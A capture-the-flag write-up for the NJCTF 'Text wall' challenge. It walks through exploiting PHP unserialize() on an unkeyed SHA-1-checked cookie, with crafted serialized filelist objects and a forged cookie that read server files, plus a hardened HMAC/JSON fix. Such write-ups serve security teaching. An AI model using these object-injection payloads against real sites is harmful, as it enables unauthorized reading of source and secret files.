
NJCTF Text wall writeup

2017-03-19 10:51 Source: 清屏网 (QingPingShan.com)

NJCTF Text wall writeup: a PHP deserialization challenge

0x00 Approach

After entering hiehiehie and clicking submit, inspect the cookies: there is a lists parameter whose value is:

24c5889e00902d6bcc65073f0e91ea30bbe203c2a:1:{i:0;s:9:"hiehiehie";}

The leading part looks like an MD5 at first, but hashing a:1:{i:0;s:9:"hiehiehie";} shows it is actually a SHA-1 digest (40 hex characters).

As usual, this is a deserialization challenge. Building a payload normally requires the source, so the next step was finding a source leak, which turned up at:

http://218.2.197.235:23721/.index.php.swo

It looks like this:

<?php
$lists = [];
Class filelist{
    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
........
?>

__toString() is called when an object is echoed.

So first build a serialized filelist object yourself:

<?php
class filelist{
    // declared so the property is not a dynamic one; serializes identically
    public $source;

    function __construct(){
        $this->source = 'index.php';
    }

    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
$file = new filelist();
var_dump(serialize($file));
?>

Result:

string 'O:8:"filelist":1:{s:6:"source";s:9:"index.php";}' (length=48)

Put it into the cookie and submit.

This is what comes back:

It printed out index.php (the property value, not the file's contents): the echo happens on the object's members, not on the whole serialized object we passed in.

So instead, define a class whose member variable is itself a filelist instance:

<?php
$lists = [];
class a{
    public $a;

    function __construct(){
        $this->a = new filelist();
    }
}
class filelist{
    public $source;

    function __construct(){
        $this->source = 'index.php';
    } // added a constructor ourselves to set source

    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
$file = new a();
var_dump(serialize($file));
?>

Class a is an arbitrary wrapper: the goal is to get its member a echoed, and since a is a filelist instance, filelist's __toString() runs and prints the source of whatever file source points at.

Result:

string 'O:1:"a":1:{s:1:"a";O:8:"filelist":1:{s:6:"source";s:9:"index.php";}}' (length=68)

Submit:

9f57a6efb19d4e418d5c4284ef002eb4e5eec13aO:1:"a":1:{s:1:"a";O:8:"filelist":1:{s:6:"source";s:9:"index.php";}}

This returns the source of index.php.

It reveals the path of the flag; the same method reads the flag file.

index.php:

<?php
//The flag is /var/www/PnK76P1IDfY5KrwsJrh1pL3c6XJ3fj7E_fl4g
$lists = [];
Class filelist{
    public function __toString()
    {
        return highlight_file('hiehiehie.txt', true).highlight_file($this->source, true);
    }
}
if(isset($_COOKIE['lists'])){
    $cookie = $_COOKIE['lists'];
    $hash = substr($cookie, 0, 40);
    $sha1 = substr($cookie, 40);
    if(sha1($sha1) === $hash){
        $lists = unserialize($sha1);
    }
}
if(isset($_POST['hiehiehie'])){
    $info = $_POST['hiehiehie'];
    $lists[] = $info;
    $sha1 = serialize($lists);
    $hash = sha1($sha1);
    setcookie('lists', $hash.$sha1);
    header('Location: '.$_SERVER['REQUEST_URI']);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
  <title>Please Get Flag!!</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="http://apps.bdimg.com/libs/bootstrap/3.3.0/css/bootstrap.min.css">  
  <script src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.min.js"></script>
  <script src="http://apps.bdimg.com/libs/bootstrap/3.3.0/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
    <div class="jumbotron">
        <h1>Please Get Flag!!</h1>
    </div>
    <div class="row">
        <?php foreach($lists as $info):?>
            <div class="col-sm-4">
              <h3><?=$info?></h3>
            </div>
        <?php endforeach;?>
    </div>
    <form method="post" href=".">
        <input name="hiehiehie" value="hiehiehie">
        <input type="submit" value="submit">
    </form>
</div>
</body>
</html>
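The weak spots in the leaked index.php are that sha1() over the payload is not a secret-keyed authenticator (anyone can recompute it over their own serialized object) and that unserialize() runs on cookie data, which is what lets filelist::__toString() fire. Below is a hardened version of the cookie handling, added here as an example and not code from the writeup or the challenge; the secret and sample values are constructed.

```php
<?php
// Added example, not part of the original writeup or challenge code.
// Hardened replacement for the cookie handling in index.php:
//  - the list is encoded as JSON, so no object is ever instantiated from the cookie
//  - integrity comes from HMAC-SHA256 with a server-side secret, not a bare sha1()
//  - the tag is compared with hash_equals() to avoid timing leaks
const COOKIE_NAME = 'lists';

function sign_list(array $lists, string $secret): string {
    $body = json_encode(array_values($lists), JSON_THROW_ON_ERROR);
    $tag  = hash_hmac('sha256', $body, $secret);   // 64 hex chars
    return $tag . $body;
}

function verify_list(string $cookie, string $secret): ?array {
    if (strlen($cookie) < 64) {
        return null;
    }
    $tag  = substr($cookie, 0, 64);
    $body = substr($cookie, 64);
    if (!hash_equals(hash_hmac('sha256', $body, $secret), $tag)) {
        return null;                                // forged or tampered
    }
    $lists = json_decode($body, true);              // arrays only, never objects
    if (!is_array($lists)) {
        return null;
    }
    // keep only plain strings; anything else is rejected
    return array_values(array_filter($lists, 'is_string'));
}

// Demo with constructed values; a real deployment loads the secret from configuration.
$secret = 'constructed-demo-secret-use-32-random-bytes';
$cookie = sign_list(['hiehiehie'], $secret);
var_dump(verify_list($cookie, $secret));            // array(1) { [0]=> "hiehiehie" }

// The writeup's style of cookie (sha1 + serialized object) fails the HMAC check:
$payload = 'O:8:"filelist":1:{s:6:"source";s:9:"index.php";}';
var_dump(verify_list(sha1($payload) . $payload, $secret));   // NULL
```

If the serialized format has to be kept, unserialize($s, ['allowed_classes' => false]) (PHP 7+) turns any object in the payload into __PHP_Incomplete_Class so no __toString() can run, but the keyed HMAC is still required to stop forgery.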
